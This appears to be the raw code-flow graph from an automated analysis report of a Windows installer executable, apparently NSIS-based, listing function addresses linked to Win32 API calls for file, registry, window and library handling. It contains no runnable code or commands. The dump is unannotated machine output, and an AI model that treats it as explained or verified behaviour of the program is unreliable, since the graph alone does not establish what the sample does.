MessageBoxIndirectW 4795->4797 4796 403727 4798 4037aa ExitProcess 4796->4798 4799 406254 3 API calls 4796->4799 4803 40363f ExitProcess 4797->4803 4804 403736 4799->4804 4805 405a3d 18 API calls 4801->4805 4802->4785 4806 403663 CreateDirectoryW SetCurrentDirectoryW 4802->4806 4807 406254 3 API calls 4804->4807 4808 4035ee 4805->4808 4809 403686 4806->4809 4810 40367b 4806->4810 4811 40373f 4807->4811 4808->4785 4929 405eea lstrcpynW 4808->4929 4941 405eea lstrcpynW 4809->4941 4940 405eea lstrcpynW 4810->4940 4814 406254 3 API calls 4811->4814 4816 403748 4814->4816 4818 403796 ExitWindowsEx 4816->4818 4825 403756 GetCurrentProcess 4816->4825 4817 4035fd 4930 405eea lstrcpynW 4817->4930 4818->4798 4821 4037a3 4818->4821 4820 405f0c 18 API calls 4822 4036c5 DeleteFileW 4820->4822 4823 40140b 2 API calls 4821->4823 4824 4036d2 CopyFileW 4822->4824 4831 403694 4822->4831 4823->4798 4824->4831 4828 403766 4825->4828 4826 40371b 4829 405d84 40 API calls 4826->4829 4827 405d84 40 API calls 4827->4831 4828->4818 4829->4785 4830 405f0c 18 API calls 4830->4831 4831->4820 4831->4826 4831->4827 4831->4830 4832 405665 2 API calls 4831->4832 4833 403706 CloseHandle 4831->4833 4832->4831 4833->4831 4834->4765 4835->4767 4837 40617e 5 API calls 4836->4837 4839 403332 4837->4839 4838 40333c 4838->4774 4839->4838 4840 405935 3 API calls 4839->4840 4841 403344 CreateDirectoryW 4840->4841 4942 405b85 4841->4942 4946 405b56 GetFileAttributesW CreateFileW 4844->4946 4846 402dff 4873 402e0c 4846->4873 4947 405eea lstrcpynW 4846->4947 4848 402e22 4849 405981 2 API calls 4848->4849 4850 402e28 4849->4850 4948 405eea lstrcpynW 4850->4948 4852 402e33 GetFileSize 4853 402f34 4852->4853 4872 402e4a 4852->4872 4854 402d1a 33 API calls 4853->4854 4856 402f3b 4854->4856 4855 4032f9 ReadFile 4855->4872 4858 402f77 GlobalAlloc 4856->4858 4856->4873 4950 40330f SetFilePointer 4856->4950 4857 402fcf 4860 402d1a 33 API calls 4857->4860 4859 402f8e 4858->4859 4865 405b85 2 API calls 4859->4865 4860->4873 4862 402f58 4863 4032f9 ReadFile 4862->4863 4866 402f63 4863->4866 4864 402d1a 33 API calls 4864->4872 4867 402f9f CreateFileW 4865->4867 4866->4858 4866->4873 4868 402fd9 4867->4868 4867->4873 4949 40330f SetFilePointer 4868->4949 4870 402fe7 4871 403062 46 API calls 4870->4871 4871->4873 4872->4853 4872->4855 4872->4857 4872->4864 4872->4873 4873->4782 4875 406254 3 API calls 4874->4875 4876 4038c8 4875->4876 4877 4038e0 4876->4877 4878 4038ce 4876->4878 4879 405db7 3 API calls 4877->4879 4960 405e31 wsprintfW 4878->4960 4880 403910 4879->4880 4882 40392f lstrcatW 4880->4882 4884 405db7 3 API calls 4880->4884 4883 4038de 4882->4883 4951 403b8a 4883->4951 4884->4882 4887 405a3d 18 API calls 4888 403961 4887->4888 4889 4039f5 4888->4889 4891 405db7 3 API calls 4888->4891 4890 405a3d 18 API calls 4889->4890 4892 4039fb 4890->4892 4893 403993 4891->4893 4894 403a0b LoadImageW 4892->4894 4895 405f0c 18 API calls 4892->4895 4893->4889 4898 4039b4 lstrlenW 4893->4898 4902 405962 CharNextW 4893->4902 4896 403ab1 4894->4896 4897 403a32 RegisterClassW 4894->4897 4895->4894 4901 40140b 2 API calls 4896->4901 4899 403abb 4897->4899 4900 403a68 SystemParametersInfoW CreateWindowExW 4897->4900 4903 4039c2 lstrcmpiW 4898->4903 4904 4039e8 4898->4904 4899->4785 4900->4896 4905 403ab7 4901->4905 4906 4039b1 4902->4906 4903->4904 4907 4039d2 GetFileAttributesW 4903->4907 4908 405935 3 API calls 4904->4908 4905->4899 4910 403b8a 19 API calls 4905->4910 4906->4898 4909 4039de 4907->4909 4911 4039ee 4908->4911 4909->4904 4913 405981 2 API calls 4909->4913 4914 403ac8 4910->4914 4961 405eea lstrcpynW 4911->4961 4913->4904 4915 403ad4 ShowWindow LoadLibraryW 4914->4915 4916 403b57 4914->4916 4917 403af3 LoadLibraryW 4915->4917 4918 403afa GetClassInfoW 4915->4918 4962 405267 OleInitialize 4916->4962 4917->4918 4920 403b24 DialogBoxParamW 4918->4920 4921 403b0e GetClassInfoW RegisterClassW 4918->4921 4923 40140b 2 API calls 4920->4923 4921->4920 4922 403b5d 4924 403b61 4922->4924 4925 403b79 4922->4925 4923->4899 4924->4899 4927 40140b 2 API calls 4924->4927 4926 40140b 2 API calls 4925->4926 4926->4899 4927->4899 4928->4772 4929->4817 4930->4789 4932 4037d3 CloseHandle 4931->4932 4933 4037dd 4931->4933 4932->4933 4934 4037f1 4933->4934 4935 4037e7 CloseHandle 4933->4935 4970 40381f 4934->4970 4935->4934 4938 405772 71 API calls 4939 403621 OleUninitialize 4938->4939 4939->4795 4939->4796 4940->4809 4941->4831 4943 405b92 GetTickCount GetTempFileNameW 4942->4943 4944 403358 4943->4944 4945 405bc8 4943->4945 4944->4774 4945->4943 4945->4944 4946->4846 4947->4848 4948->4852 4949->4870 4950->4862 4952 403b9e 4951->4952 4969 405e31 wsprintfW 4952->4969 4954 403c0f 4955 405f0c 18 API calls 4954->4955 4956 403c1b SetWindowTextW 4955->4956 4957 40393f 4956->4957 4958 403c37 4956->4958 4957->4887 4958->4957 4959 405f0c 18 API calls 4958->4959 4959->4958 4960->4883 4961->4889 4963 40417b SendMessageW 4962->4963 4964 40528a 4963->4964 4967 401389 2 API calls 4964->4967 4968 4052b1 4964->4968 4965 40417b SendMessageW 4966 4052c3 OleUninitialize 4965->4966 4966->4922 4967->4964 4968->4965 4969->4954 4971 40382d 4970->4971 4972 4037f6 4971->4972 4973 403832 FreeLibrary GlobalFree 4971->4973 4972->4938 4973->4972 4973->4973 5274 40155b 5275 40296d 5274->5275 5278 405e31 wsprintfW 5275->5278 5277 402972 5278->5277 3905 4023e0 3916 402c44 3905->3916 3907 4023ea 3920 402b3a 3907->3920 3910 402793 3911 4023fe RegQueryValueExW 3912 40241e 3911->3912 3915 402424 RegCloseKey 3911->3915 3912->3915 3926 405e31 wsprintfW 3912->3926 3915->3910 3917 402b3a 18 API calls 3916->3917 3918 402c5d 3917->3918 3919 402c6b RegOpenKeyExW 3918->3919 3919->3907 3921 402b46 3920->3921 3927 405f0c 3921->3927 3924 4023f3 3924->3910 3924->3911 3926->3915 3929 405f19 3927->3929 3928 406164 3930 402b67 3928->3930 3961 405eea lstrcpynW 3928->3961 3929->3928 3932 405fcc GetVersion 3929->3932 3933 406132 lstrlenW 3929->3933 3935 405f0c 10 API calls 3929->3935 3938 406047 GetSystemDirectoryW 3929->3938 3939 40605a GetWindowsDirectoryW 3929->3939 3940 40617e 5 API calls 3929->3940 3941 405f0c 10 API calls 3929->3941 3942 4060d3 lstrcatW 3929->3942 3943 40608e SHGetSpecialFolderLocation 3929->3943 3954 405db7 RegOpenKeyExW 3929->3954 3959 405e31 wsprintfW 3929->3959 3960 405eea lstrcpynW 3929->3960 3930->3924 3945 40617e 3930->3945 3932->3929 3933->3929 3935->3933 3938->3929 3939->3929 3940->3929 3941->3929 3942->3929 3943->3929 3944 4060a6 SHGetPathFromIDListW CoTaskMemFree 3943->3944 3944->3929 3946 40618b 3945->3946 3948 4061f4 CharNextW 3946->3948 3950 406201 3946->3950 3952 4061e0 CharNextW 3946->3952 3953 4061ef CharNextW 3946->3953 3962 405962 3946->3962 3947 406206 CharPrevW 3947->3950 3948->3946 3948->3950 3950->3947 3951 406227 3950->3951 3951->3924 3952->3946 3953->3948 3955 405e2b 3954->3955 3956 405deb RegQueryValueExW 3954->3956 3955->3929 3957 405e0c RegCloseKey 3956->3957 3957->3955 3959->3929 3960->3929 3961->3930 3963 405968 3962->3963 3964 40597e 3963->3964 3965 40596f CharNextW 3963->3965 3964->3946 3965->3963 5286 401ce5 GetDlgItem GetClientRect 5287 402b3a 18 API calls 5286->5287 5288 401d17 LoadImageW SendMessageW 5287->5288 5289 401d35 DeleteObject 5288->5289 5290 4029c7 5288->5290 5289->5290 4188 40206a 4189 402b3a 18 API calls 4188->4189 4190 402071 4189->4190 4191 402b3a 18 API calls 4190->4191 4192 40207b 4191->4192 4193 402b3a 18 API calls 4192->4193 4194 402084 4193->4194 4195 402b3a 18 API calls 4194->4195 4196 40208e 4195->4196 4197 402b3a 18 API calls 4196->4197 4198 402098 4197->4198 4199 4020ac CoCreateInstance 4198->4199 4200 402b3a 18 API calls 4198->4200 4203 4020cb 4199->4203 4200->4199 4202 402197 4203->4202 4204 401423 4203->4204 4205 405194 25 API calls 4204->4205 4206 401431 4205->4206 4206->4202 5291 40156b 5292 401584 5291->5292 5293 40157b ShowWindow 5291->5293 5294 401592 ShowWindow 5292->5294 5295 4029c7 5292->5295 5293->5292 5294->5295 5296 4024ee 5297 4024f3 5296->5297 5298 40250c 5296->5298 5299 402b1d 18 API calls 5297->5299 5300 402512 5298->5300 5301 40253e 5298->5301 5304 4024fa 5299->5304 5302 402b3a 18 API calls 5300->5302 5303 402b3a 18 API calls 5301->5303 5305 402519 WideCharToMultiByte lstrlenA 5302->5305 5306 402545 lstrlenW 5303->5306 5307 402567 WriteFile 5304->5307 5308 402793 5304->5308 5305->5304 5306->5304 5307->5308 5309 4018ef 5310 401926 5309->5310 5311 402b3a 18 API calls 5310->5311 5312 40192b 5311->5312 5313 405772 71 API calls 5312->5313 5314 401934 5313->5314 5315 402770 5316 402b3a 18 API calls 5315->5316 5317 402777 FindFirstFileW 5316->5317 5318 40278a 5317->5318 5319 40279f 5317->5319 5320 4027a8 5319->5320 5323 405e31 wsprintfW 5319->5323 5324 405eea lstrcpynW 5320->5324 5323->5320 5324->5318 5325 4014f1 SetForegroundWindow 5326 4029c7 5325->5326 5327 403872 5328 40387d 5327->5328 5329 403881 5328->5329 5330 403884 GlobalAlloc 5328->5330 5330->5329 5331 4018f2 5332 402b3a 18 API calls 5331->5332 5333 4018f9 5332->5333 5334 4056c6 MessageBoxIndirectW 5333->5334 5335 401902 5334->5335 4445 402573 4446 402b1d 18 API calls 4445->4446 4447 402582 4446->4447 4448 4025c8 ReadFile 4447->4448 4449 405bd9 ReadFile 4447->4449 4450 4026a2 4447->4450 4451 402608 MultiByteToWideChar 4447->4451 4453 40262e SetFilePointer MultiByteToWideChar 4447->4453 4454 4026b3 4447->4454 4456 4026a0 4447->4456 4448->4447 4448->4456 4449->4447 4457 405e31 wsprintfW 4450->4457 4451->4447 4453->4447 4455 4026d4 SetFilePointer 4454->4455 4454->4456 4455->4456 4457->4456 5336 401df3 5337 402b3a 18 API calls 5336->5337 5338 401df9 5337->5338 5339 402b3a 18 API calls 5338->5339 5340 401e02 5339->5340 5341 402b3a 18 API calls 5340->5341 5342 401e0b 5341->5342 5343 402b3a 18 API calls 5342->5343 5344 401e14 5343->5344 5345 401423 25 API calls 5344->5345 5346 401e1b ShellExecuteW 5345->5346 5347 401e4c 5346->5347 4733 4026f9 4734 402700 4733->4734 4737 402972 4733->4737 4735 402b1d 18 API calls 4734->4735 4736 40270b 4735->4736 4738 402712 SetFilePointer 4736->4738 4738->4737 4739 402722 4738->4739 4741 405e31 wsprintfW 4739->4741 4741->4737 5374 1000103d 5375 1000101b 8 API calls 5374->5375 5376 10001056 5375->5376 5377 40427d lstrlenW 5378 40429c 5377->5378 5379 40429e WideCharToMultiByte 5377->5379 5378->5379 5380 402c7f 5381 402c91 SetTimer 5380->5381 5382 402caa 5380->5382 5381->5382 5383 402cf8 5382->5383 5384 402cfe MulDiv 5382->5384 5385 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5384->5385 5385->5383 5387 4014ff 5388 401507 5387->5388 5390 40151a 5387->5390 5389 402b1d 18 API calls 5388->5389 5389->5390 5391 401000 5392 401037 BeginPaint GetClientRect 5391->5392 5395 40100c DefWindowProcW 5391->5395 5393 4010f3 5392->5393 5397 401073 CreateBrushIndirect FillRect DeleteObject 5393->5397 5398 4010fc 5393->5398 5396 401179 5395->5396 5397->5393 5399 401102 CreateFontIndirectW 5398->5399 5400 401167 EndPaint 5398->5400 5399->5400 5401 401112 6 API calls 5399->5401 5400->5396 5401->5400 5402 401a00 5403 402b3a 18 API calls 5402->5403 5404 401a09 ExpandEnvironmentStringsW 5403->5404 5405 401a30 5404->5405 5406 401a1d 5404->5406 5406->5405 5407 401a22 lstrcmpW 5406->5407 5407->5405 5408 401b01 5409 402b3a 18 API calls 5408->5409 5410 401b08 5409->5410 5411 402b1d 18 API calls 5410->5411 5412 401b11 wsprintfW 5411->5412 5413 4029c7 5412->5413 5414 100018c1 5415 10001243 3 API calls 5414->5415 5416 100018e7 5415->5416 5417 10001243 3 API calls 5416->5417 5418 100018ef 5417->5418 5419 10001243 3 API calls 5418->5419 5421 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5418->5421 5420 10001916 5419->5420 5422 1000191f GlobalFree 5420->5422 5423 10001280 2 API calls 5421->5423 5422->5421 5424 10001aad GlobalFree GlobalFree 5423->5424 5425 10002a43 5426 10002a5b 5425->5426 5427 100015a7 2 API calls 5426->5427 5428 10002a76 5427->5428 5429 404583 5430 404593 5429->5430 5431 4045b9 5429->5431 5432 40412f 19 API calls 5430->5432 5433 404196 8 API calls 5431->5433 5434 4045a0 SetDlgItemTextW 5432->5434 5435 4045c5 5433->5435 5434->5431 4147 405108 4148 405118 4147->4148 4149 40512c 4147->4149 4150 40511e 4148->4150 4160 405175 4148->4160 4151 405134 IsWindowVisible 4149->4151 4158 405154 4149->4158 4161 40417b 4150->4161 4154 405141 4151->4154 4151->4160 4152 40517a CallWindowProcW 4155 405128 4152->4155 4164 404a5e SendMessageW 4154->4164 4158->4152 4169 404ade 4158->4169 4160->4152 4162 404193 4161->4162 4163 404184 SendMessageW 4161->4163 4162->4155 4163->4162 4165 404a81 GetMessagePos ScreenToClient SendMessageW 4164->4165 4166 404abd SendMessageW 4164->4166 4167 404ab5 4165->4167 4168 404aba 4165->4168 4166->4167 4167->4158 4168->4166 4178 405eea lstrcpynW 4169->4178 4171 404af1 4179 405e31 wsprintfW 4171->4179 4173 404afb 4180 40140b 4173->4180 4177 404b0b 4177->4160 4178->4171 4179->4173 4184 401389 4180->4184 4183 405eea lstrcpynW 4183->4177 4185 401390 4184->4185 4186 4013fe 4185->4186 4187 4013cb MulDiv SendMessageW 4185->4187 4186->4183 4187->4185 5436 401f08 5437 402b3a 18 API calls 5436->5437 5438 401f0f GetFileVersionInfoSizeW 5437->5438 5439 401f36 GlobalAlloc 5438->5439 5441 401f8c 5438->5441 5440 401f4a GetFileVersionInfoW 5439->5440 5439->5441 5440->5441 5442 401f59 VerQueryValueW 5440->5442 5442->5441 5443 401f72 5442->5443 5447 405e31 wsprintfW 5443->5447 5445 401f7e 5448 405e31 wsprintfW 5445->5448 5447->5445 5448->5441 5456 1000224c 5457 100022b1 5456->5457 5458 100022e7 5456->5458 5457->5458 5459 100022c3 GlobalAlloc 5457->5459 5459->5457 5460 100016ce 5461 100016fd 5460->5461 5462 10001b3e 24 API calls 5461->5462 5463 10001704 5462->5463 5464 10001717 5463->5464 5465 1000170b 5463->5465 5467 10001721 5464->5467 5468 1000173e 5464->5468 5466 10001280 2 API calls 5465->5466 5471 10001715 5466->5471 5472 10001555 3 API calls 5467->5472 5469 10001744 5468->5469 5470 10001768 5468->5470 5473 100015cc 3 API calls 5469->5473 5474 10001555 3 API calls 5470->5474 5475 10001726 5472->5475 5476 10001749 5473->5476 5474->5471 5477 100015cc 3 API calls 5475->5477 5479 10001280 2 API calls 5476->5479 5478 1000172c 5477->5478 5480 10001280 2 API calls 5478->5480 5481 1000174f GlobalFree 5479->5481 5482 10001732 GlobalFree 5480->5482 5481->5471 5483 10001763 GlobalFree 5481->5483 5482->5471 5483->5471 4210 404b10 GetDlgItem GetDlgItem 4211 404b62 7 API calls 4210->4211 4214 404d7b 4210->4214 4212 404c05 DeleteObject 4211->4212 4213 404bf8 SendMessageW 4211->4213 4215 404c0e 4212->4215 4213->4212 4223 404ddb 4214->4223 4226 404e40 4214->4226 4228 404e5f 4214->4228 4216 404c45 4215->4216 4217 404c1d 4215->4217 4266 40412f 4216->4266 4220 405f0c 18 API calls 4217->4220 4219 404f0b 4221 404f15 SendMessageW 4219->4221 4229 404f1d 4219->4229 4222 404c27 SendMessageW SendMessageW 4220->4222 4221->4229 4222->4215 4230 404a5e 5 API calls 4223->4230 4224 404c59 4231 40412f 19 API calls 4224->4231 4225 4050f3 4279 404196 4225->4279 4227 404e51 SendMessageW 4226->4227 4226->4228 4227->4228 4228->4219 4228->4225 4232 404eb8 SendMessageW 4228->4232 4235 404f36 4229->4235 4236 404f2f ImageList_Destroy 4229->4236 4243 404f46 4229->4243 4247 404dec 4230->4247 4248 404c67 4231->4248 4232->4225 4238 404ecd SendMessageW 4232->4238 4239 404f3f GlobalFree 4235->4239 4235->4243 4236->4235 4237 4050b5 4237->4225 4244 4050c7 ShowWindow GetDlgItem ShowWindow 4237->4244 4241 404ee0 4238->4241 4239->4243 4240 404d3c GetWindowLongW SetWindowLongW 4242 404d55 4240->4242 4252 404ef1 SendMessageW 4241->4252 4245 404d73 4242->4245 4246 404d5b ShowWindow 4242->4246 4243->4237 4256 404ade 4 API calls 4243->4256 4260 404f81 4243->4260 4244->4225 4270 404164 SendMessageW 4245->4270 4269 404164 SendMessageW 4246->4269 4247->4226 4248->4240 4251 404cb7 SendMessageW 4248->4251 4253 404d36 4248->4253 4254 404cf3 SendMessageW 4248->4254 4255 404d04 SendMessageW 4248->4255 4251->4248 4252->4219 4253->4240 4253->4242 4254->4248 4255->4248 4256->4260 4257 404d6e 4257->4225 4258 40508b InvalidateRect 4258->4237 4259 4050a1 4258->4259 4271 404978 4259->4271 4261 404faf SendMessageW 4260->4261 4262 404fc5 4260->4262 4261->4262 4262->4258 4263 405026 4262->4263 4265 405039 SendMessageW SendMessageW 4262->4265 4263->4265 4265->4262 4267 405f0c 18 API calls 4266->4267 4268 40413a SetDlgItemTextW 4267->4268 4268->4224 4269->4257 4270->4214 4272 404995 4271->4272 4273 405f0c 18 API calls 4272->4273 4274 4049ca 4273->4274 4275 405f0c 18 API calls 4274->4275 4276 4049d5 4275->4276 4277 405f0c 18 API calls 4276->4277 4278 404a06 lstrlenW wsprintfW SetDlgItemTextW 4277->4278 4278->4237 4280 4041ae GetWindowLongW 4279->4280 4281 404237 4279->4281 4280->4281 4282 4041bf 4280->4282 4283 4041d1 4282->4283 4284 4041ce GetSysColor 4282->4284 4285 4041e1 SetBkMode 4283->4285 4286 4041d7 SetTextColor 4283->4286 4284->4283 4287 4041f9 GetSysColor 4285->4287 4288 4041ff 4285->4288 4286->4285 4287->4288 4289 404210 4288->4289 4290 404206 SetBkColor 4288->4290 4289->4281 4291 404223 DeleteObject 4289->4291 4292 40422a CreateBrushIndirect 4289->4292 4290->4289 4291->4292 4292->4281 5484 401491 5485 405194 25 API calls 5484->5485 5486 401498 5485->5486 5487 404912 5488 404922 5487->5488 5489 40493e 5487->5489 5498 4056aa GetDlgItemTextW 5488->5498 5491 404971 5489->5491 5492 404944 SHGetPathFromIDListW 5489->5492 5494 40495b SendMessageW 5492->5494 5495 404954 5492->5495 5493 40492f SendMessageW 5493->5489 5494->5491 5497 40140b 2 API calls 5495->5497 5497->5494 5498->5493 5499 402295 5500 402b3a 18 API calls 5499->5500 5501 4022a4 5500->5501 5502 402b3a 18 API calls 5501->5502 5503 4022ad 5502->5503 5504 402b3a 18 API calls 5503->5504 5505 4022b7 GetPrivateProfileStringW 5504->5505 4535 401718 4536 402b3a 18 API calls 4535->4536 4537 40171f SearchPathW 4536->4537 4538 40173a 4537->4538 4539 401f98 4540 40205c 4539->4540 4541 401faa 4539->4541 4544 401423 25 API calls 4540->4544 4542 402b3a 18 API calls 4541->4542 4543 401fb1 4542->4543 4545 402b3a 18 API calls 4543->4545 4549 402197 4544->4549 4546 401fba 4545->4546 4547 401fd0 LoadLibraryExW 4546->4547 4548 401fc2 GetModuleHandleW 4546->4548 4547->4540 4550 401fe1 4547->4550 4548->4547 4548->4550 4562 4062c0 WideCharToMultiByte 4550->4562 4553 401ff2 4555 402011 4553->4555 4556 401ffa 4553->4556 4554 40202b 4557 405194 25 API calls 4554->4557 4565 10001771 4555->4565 4558 401423 25 API calls 4556->4558 4559 402002 4557->4559 4558->4559 4559->4549 4560 40204e FreeLibrary 4559->4560 4560->4549 4563 4062ea GetProcAddress 4562->4563 4564 401fec 4562->4564 4563->4564 4564->4553 4564->4554 4566 100017a1 4565->4566 4607 10001b3e 4566->4607 4568 100017a8 4569 100018be 4568->4569 4570 100017c0 4568->4570 4571 100017b9 4568->4571 4569->4559 4641 100022eb 4570->4641 4659 100022a1 4571->4659 4576 100017d6 4581 100017dc 4576->4581 4585 100017e7 4576->4585 4577 100017ef 4591 100017e5 4577->4591 4669 10002b23 4577->4669 4578 10001824 4582 10001866 4578->4582 4583 1000182a 4578->4583 4579 10001806 4672 1000248d 4579->4672 4581->4591 4653 10002868 4581->4653 4589 1000248d 10 API calls 4582->4589 4587 100015cc 3 API calls 4583->4587 4663 1000260b 4585->4663 4593 10001840 4587->4593 4594 10001858 4589->4594 4591->4578 4591->4579 4597 1000248d 10 API calls 4593->4597 4606 100018ad 4594->4606 4695 10002450 4594->4695 4596 100017ed 4596->4591 4597->4594 4601 100018b7 GlobalFree 4601->4569 4603 10001899 4603->4606 4699 10001555 wsprintfW 4603->4699 4604 10001892 FreeLibrary 4604->4603 4606->4569 4606->4601 4702 1000121b GlobalAlloc 4607->4702 4609 10001b62 4703 1000121b GlobalAlloc 4609->4703 4611 10001b6d 4704 10001243 4611->4704 4613 10001da0 GlobalFree GlobalFree GlobalFree 4614 10001dbd 4613->4614 4629 10001e07 4613->4629 4615 1000210d 4614->4615 4623 10001dd2 4614->4623 4614->4629 4617 1000212f GetModuleHandleW 4615->4617 4615->4629 4616 10001c43 GlobalAlloc 4638 10001b75 4616->4638 4618 10002140 LoadLibraryW 4617->4618 4619 10002155 4617->4619 4618->4619 4618->4629 4715 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4619->4715 4620 10001c8e lstrcpyW 4624 10001c98 lstrcpyW 4620->4624 4621 10001cac GlobalFree 4621->4638 4623->4629 4711 1000122c 4623->4711 4624->4638 4625 100021a7 4627 100021b4 lstrlenW 4625->4627 4625->4629 4716 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4627->4716 4629->4568 4630 10002167 4630->4625 4640 10002191 GetProcAddress 4630->4640 4631 10002067 4631->4629 4634 100020af lstrcpyW 4631->4634 4633 100021ce 4633->4629 4634->4629 4635 10001cea 4635->4638 4709 100015a7 GlobalSize GlobalAlloc 4635->4709 4636 10001f56 GlobalFree 4636->4638 4638->4613 4638->4616 4638->4620 4638->4621 4638->4624 4638->4629 4638->4631 4638->4635 4638->4636 4639 1000122c 2 API calls 4638->4639 4714 1000121b GlobalAlloc 4638->4714 4639->4638 4640->4625 4649 10002303 4641->4649 4642 1000122c GlobalAlloc lstrcpynW 4642->4649 4643 10001243 3 API calls 4643->4649 4645 10002419 GlobalFree 4646 100017c6 4645->4646 4645->4649 4646->4576 4646->4577 4646->4591 4647 100023d5 GlobalAlloc WideCharToMultiByte 4647->4645 4648 100023ae GlobalAlloc 4651 1000239b 4648->4651 4649->4642 4649->4643 4649->4645 4649->4647 4649->4648 4650 10002390 lstrlenW 4649->4650 4719 100012c8 4649->4719 4650->4645 4650->4651 4651->4645 4724 1000259f 4651->4724 4655 1000287a 4653->4655 4654 1000291f SetFilePointer 4656 1000293d 4654->4656 4655->4654 4657 10002a39 4656->4657 4658 10002a2e GetLastError 4656->4658 4657->4591 4658->4657 4660 100022b1 4659->4660 4662 100017bf 4659->4662 4661 100022c3 GlobalAlloc 4660->4661 4660->4662 4661->4660 4662->4570 4667 10002627 4663->4667 4664 10002678 GlobalAlloc 4668 1000269a 4664->4668 4665 1000268b 4666 10002690 GlobalSize 4665->4666 4665->4668 4666->4668 4667->4664 4667->4665 4668->4596 4670 10002b2e 4669->4670 4671 10002b6e GlobalFree 4670->4671 4676 100024ad 4672->4676 4674 100024db wsprintfW 4674->4676 4675 10002581 GlobalFree 4675->4676 4679 1000180c 4675->4679 4676->4674 4676->4675 4677 10002558 GlobalFree 4676->4677 4678 1000250e MultiByteToWideChar 4676->4678 4680 100024fd lstrcpynW 4676->4680 4681 100024ec StringFromGUID2 4676->4681 4682 10001280 2 API calls 4676->4682 4727 1000121b GlobalAlloc 4676->4727 4728 100012f3 4676->4728 4677->4676 4678->4676 4684 100015cc 4679->4684 4680->4676 4681->4676 4682->4676 4732 1000121b GlobalAlloc 4684->4732 4686 100015d2 4687 100015df lstrcpyW 4686->4687 4689 100015f9 4686->4689 4690 10001613 4687->4690 4689->4690 4691 100015fe wsprintfW 4689->4691 4692 10001280 4690->4692 4691->4690 4693 100012c3 GlobalFree 4692->4693 4694 10001289 GlobalAlloc lstrcpynW 4692->4694 4693->4594 4694->4693 4696 1000245e 4695->4696 4698 10001879 4695->4698 4697 1000247a GlobalFree 4696->4697 4696->4698 4697->4696 4698->4603 4698->4604 4700 10001280 2 API calls 4699->4700 4701 10001576 4700->4701 4701->4606 4702->4609 4703->4611 4705 1000127c 4704->4705 4706 1000124d 4704->4706 4705->4638 4706->4705 4717 1000121b GlobalAlloc 4706->4717 4708 10001259 lstrcpyW GlobalFree 4708->4638 4710 100015c5 4709->4710 4710->4635 4718 1000121b GlobalAlloc 4711->4718 4713 1000123b lstrcpynW 4713->4629 4714->4638 4715->4630 4716->4633 4717->4708 4718->4713 4720 100012ee 4719->4720 4721 100012d0 4719->4721 4720->4720 4721->4720 4722 1000122c 2 API calls 4721->4722 4723 100012ec 4722->4723 4723->4649 4725 10002603 4724->4725 4726 100025ad VirtualAlloc 4724->4726 4725->4651 4726->4725 4727->4676 4729 10001324 4728->4729 4730 100012fc 4728->4730 4729->4676 4730->4729 4731 10001308 lstrcpyW 4730->4731 4731->4729 4732->4686 5506 10001058 5507 10001243 3 API calls 5506->5507 5509 10001074 5507->5509 5508 100010dd 5509->5508 5510 1000152e 4 API calls 5509->5510 5511 10001092 5509->5511 5510->5511 5512 1000152e 4 API calls 5511->5512 5513 100010a2 5512->5513 5514 100010b2 5513->5514 5515 100010a9 GlobalSize 5513->5515 5516 100010b6 GlobalAlloc 5514->5516 5517 100010c7 5514->5517 5515->5514 5518 10001555 3 API calls 5516->5518 5519 100010d2 GlobalFree 5517->5519 5518->5517 5519->5508 5520 40159b 5521 402b3a 18 API calls 5520->5521 5522 4015a2 SetFileAttributesW 5521->5522 5523 4015b4 5522->5523 5524 40149e 5525 4014ac PostQuitMessage 5524->5525 5526 40223e 5524->5526 5525->5526 5527 4021a0 5528 402b3a 18 API calls 5527->5528 5529 4021a6 5528->5529 5530 402b3a 18 API calls 5529->5530 5531 4021af 5530->5531 5532 402b3a 18 API calls 5531->5532 5533 4021b8 5532->5533 5534 40622d 2 API calls 5533->5534 5535 4021c1 5534->5535 5536 4021d2 lstrlenW lstrlenW 5535->5536 5537 4021c5 5535->5537 5539 405194 25 API calls 5536->5539 5538 405194 25 API calls 5537->5538 5541 4021cd 5537->5541 5538->5541 5540 402210 SHFileOperationW 5539->5540 5540->5537 5540->5541 5542 100010e1 5543 10001111 5542->5543 5544 10001243 3 API calls 5543->5544 5554 10001121 5544->5554 5545 100011d8 GlobalFree 5546 100012c8 2 API calls 5546->5554 5547 100011d3 5547->5545 5548 10001243 3 API calls 5548->5554 5549 10001280 2 API calls 5552 100011c4 GlobalFree 5549->5552 5550 10001164 GlobalAlloc 5550->5554 5551 100011f8 GlobalFree 5551->5554 5552->5554 5553 100012f3 lstrcpyW 5553->5554 5554->5545 5554->5546 5554->5547 5554->5548 5554->5549 5554->5550 5554->5551 5554->5552 5554->5553 3966 401b22 3967 401b73 3966->3967 3968 401b2f 3966->3968 3970 401b78 3967->3970 3971 401b9d GlobalAlloc 3967->3971 3969 401bb8 3968->3969 3974 401b46 3968->3974 3973 405f0c 18 API calls 3969->3973 3982 40223e 3969->3982 3970->3982 3987 405eea lstrcpynW 3970->3987 3972 405f0c 18 API calls 3971->3972 3972->3969 3975 402238 3973->3975 3985 405eea lstrcpynW 3974->3985 3988 4056c6 3975->3988 3978 401b8a GlobalFree 3978->3982 3979 401b55 3986 405eea lstrcpynW 3979->3986 3983 401b64 3992 405eea lstrcpynW 3983->3992 3985->3979 3986->3983 3987->3978 3989 4056db 3988->3989 3990 405727 3989->3990 3991 4056ef MessageBoxIndirectW 3989->3991 3990->3982 3991->3990 3992->3982 5555 4029a2 SendMessageW 5556 4029c7 5555->5556 5557 4029bc InvalidateRect 5555->5557 5557->5556 3993 401924 3994 401926 3993->3994 3995 402b3a 18 API calls 3994->3995 3996 40192b 3995->3996 3999 405772 3996->3999 4038 405a3d 3999->4038 4002 4057b1 4009 4058d1 4002->4009 4052 405eea lstrcpynW 4002->4052 4003 40579a DeleteFileW 4004 401934 4003->4004 4006 4057d7 4007 4057ea 4006->4007 4008 4057dd lstrcatW 4006->4008 4053 405981 lstrlenW 4007->4053 4011 4057f0 4008->4011 4009->4004 4082 40622d FindFirstFileW 4009->4082 4014 405800 lstrcatW 4011->4014 4015 40580b lstrlenW FindFirstFileW 4011->4015 4014->4015 4015->4009 4023 40582d 4015->4023 4016 4058fa 4085 405935 lstrlenW CharPrevW 4016->4085 4019 4058b4 FindNextFileW 4019->4023 4024 4058ca FindClose 4019->4024 4020 40572a 5 API calls 4022 40590c 4020->4022 4025 405910 4022->4025 4026 405926 